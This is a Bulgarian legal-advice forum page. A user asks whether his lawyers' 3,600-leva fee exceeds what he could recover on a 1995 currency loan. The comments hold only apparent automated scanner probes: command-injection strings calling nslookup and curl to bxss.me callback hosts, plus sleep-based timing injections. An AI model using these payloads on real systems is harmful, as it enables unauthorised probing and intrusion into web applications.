неправилно изчислен хонорар

11.07.2010г. 03:27:51
Здравейте, Моля да ми отговорите на следния въпрос: На 15.02.2006г.подписах Договор за правна помощ и платих възнаграждение- 3 600лв. на авокатите във връзка със завеждане на гражданско дело за събиране на дължими суми - 36 400 щ.д. и 17 400 ДМ по сключен договор за заем от 25.07. 1995г. Съгласно Договора за заем връщането на дължимите суми е следвало да стане на 25. 09. 1995г. На тази дата котировките на валутите на БНБ са били 47.73 лв. за 1 ДМ и 67.94 Щ.Д. или длъжника ми е дължал 3303518 лв. След деноминацията сумата става 3303.52лв. или при спечелване наделото бих взел по-малко от възнаграждението -3600 лв. Моля Ви да ми отговорите дали съм прав и какви са шансовете ако заведа дело. А.Господинов

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:24
&nslookup -q=cname hitellfygjzthd5bfa.bxss.me&'\"`0&nslookup -q=cname hitellfygjzthd5bfa.bxss.me&`'
lxbfYeaa
05.10.2023г. 07:24
&(nslookup -q=cname hitflwhnsenez0b56c.bxss.me||curl hitflwhnsenez0b56c.bxss.me)&'\"`0&(nslookup -q=cname hitflwhnsenez0b56c.bxss.me||curl hitflwhnsenez0b56c.bxss.me)&`'
lxbfYeaa
05.10.2023г. 07:24
|(nslookup -q=cname hitsikdblrxfqc5f65.bxss.me||curl hitsikdblrxfqc5f65.bxss.me)
lxbfYeaa
05.10.2023г. 07:24
`(nslookup -q=cname hitsltxlwugmg168c1.bxss.me||curl hitsltxlwugmg168c1.bxss.me)`
lxbfYeaa
05.10.2023г. 07:24
;(nslookup -q=cname hitallazgqiqld2588.bxss.me||curl hitallazgqiqld2588.bxss.me)|(nslookup -q=cname hitallazgqiqld2588.bxss.me||curl hitallazgqiqld2588.bxss.me)&(nslookup -q=cname hitallazgqiqld2588.bxss.me||curl hitallazgqiqld2588.bxss.me)
lxbfYeaa
05.10.2023г. 07:24
'"()
lxbfYeaa
05.10.2023г. 07:24
'&&sleep(27*1000)*tdousy&&'
lxbfYeaa
05.10.2023г. 07:24
"&&sleep(27*1000)*rulauu&&"
lxbfYeaa
05.10.2023г. 07:24
'||sleep(27*1000)*cbyfcs||'
lxbfYeaa
05.10.2023г. 07:24
"||sleep(27*1000)*okzijw||"

Коментар